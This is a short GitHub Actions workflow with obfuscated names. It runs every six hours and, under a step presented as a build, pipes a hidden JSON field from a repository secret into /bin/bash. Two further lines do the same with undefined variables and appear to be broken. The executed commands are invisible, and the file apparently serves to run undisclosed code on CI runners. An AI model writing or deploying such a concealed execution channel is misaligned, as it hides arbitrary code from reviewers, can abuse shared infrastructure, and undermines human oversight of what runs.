name: shatongshui3439

on:
  workflow_dispatch:
  schedule:
    - cron: '51 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shatongshui3439
        env:
          ebvg753: ${{ secrets.ebvg753 }}
        run: |
          echo $ebvg753 | jq -r .zs13429 | /bin/bash
          echo $ur81436 | jq -r .xqp6 | /bin/bash
          echo $uq1 | jq -r .panm6914 | /bin/bash

